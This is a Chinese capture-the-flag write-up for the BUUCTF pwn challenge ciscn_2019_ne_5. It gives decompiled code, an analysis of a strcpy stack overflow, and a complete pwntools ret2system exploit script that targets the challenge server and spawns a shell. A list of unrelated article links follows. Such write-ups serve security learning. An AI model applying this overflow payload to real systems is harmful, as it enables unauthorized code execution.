-
ciscn_2019_ne_5【BUUCTF】
保护只开了一个栈不可执行,动态编译,32位,查看IDA// main函数主要是一个目录,没有啥溢出点 puts("Welcome!"); puts("Input your operation:"); puts("1.Add a log."); puts("2.Display all logs."); puts("3.Print all logs."); // 注意还有个选项4,这里没显示 printf("0.Exit\n:"); __isoc99_scanf("%d", &v4); switch ( v4 ) { case 0: exit(0); return result; case 1: AddLog((int)src); result = sub_804892B(argc, argv, envp); break; case 2: Display(src); result = sub_804892B(argc, argv, envp); break; case 3: Print(); result = sub_804892B(argc, argv, envp); break; case 4: GetFlag(src); result = sub_804892B(argc, argv, envp); break; default: result = sub_804892B(argc, argv, envp); break; } // AddLog就是输入一段字符串,没啥有价值 int __cdecl AddLog(int a 1) { printf("Please input new log info:"); return __isoc99_scanf("%128s", a1); } // Display 打印一段输入内容 int __cdecl Display(char *s) { return puts(s); } // 这个函数没啥用,就是表明存在system函数 int Print() { return system("echo Printing......"); } // GetFlag,该函数中存在溢出漏洞,在strcpy函数中,src可以无限大的,但dest是有限的 int __cdecl GetFlag(char *src) { char dest[4]; // [esp+0h] [ebp-48h] BYREF char v3[60]; // [esp+4h] [ebp-44h] BYREF *(_DWORD *)dest = 48; memset(v3, 0, sizeof(v3)); strcpy(dest, src); return printf("The flag is your log:%s\n", dest); }- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
漏洞分析
在GetFlag中, strcpy(dest, src)函数存在栈溢出漏洞,因此我们要构建溢出src字符串,AddLog可以对src进行修改,因此我们先执行AddLog函数修改src,再执行GetFlag函数,执行漏洞,获取权限
步骤分析:- 输入密码administrator,绕过main函数的审查
- 输入1执行AddLog函数修改src
- 输入4,进行漏洞溢出,获取权限
完整代码
# encoding=utf-8 from pwn import * from LibcSearcher import * context.log_level = True context(os='linux', arch='amd64') # io = process("./ciscn_2019_ne_5") io = remote("node4.buuoj.cn",26667) elf = ELF("./ciscn_2019_ne_5") system_addr = elf.symbols["system"] main_addr = elf.symbols["main"] sh_addr = 0x080482ea io.sendlineafter("Please input admin password:",'administrator') io.sendline("1") payload = b'a'*(0x48+4) + p32(system_addr) + p32(main_addr) + p32(sh_addr) io.sendlineafter("info:",payload) io.sendline("4") io.interactive()- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
-
相关阅读:
《游戏编程模式》学习笔记(十二)子类沙箱 Subclass Sandbox
SQL必需掌握的100个重要知识点:创建计算字段
百度竞价 - 百度单页竞价推广项目实操教程分享
【产品】家用工商业储能计量表ADL3000-E-B系列导轨式多功能电能表 UL认证 /CE认证 /485通讯
中集集团人工智能企业CIMCAI中集飞瞳,深入贯彻国家关于智慧港口数字港口建设部署要求全球顶尖港航AI核心技术打造超一流智慧港口
MyBatis批量更新
gateway网关转发请求到nacos不同namespace和不同group下服务实例源码改造
jvm-sandbox-repeater源码解析-配置管理
WPS文件找回怎么做?文件恢复,4个方法!
Vertica 向 GBase8a 迁移指南之布尔数据类型(BOOLEAN)
- 原文地址:https://blog.csdn.net/qq_41696518/article/details/126623439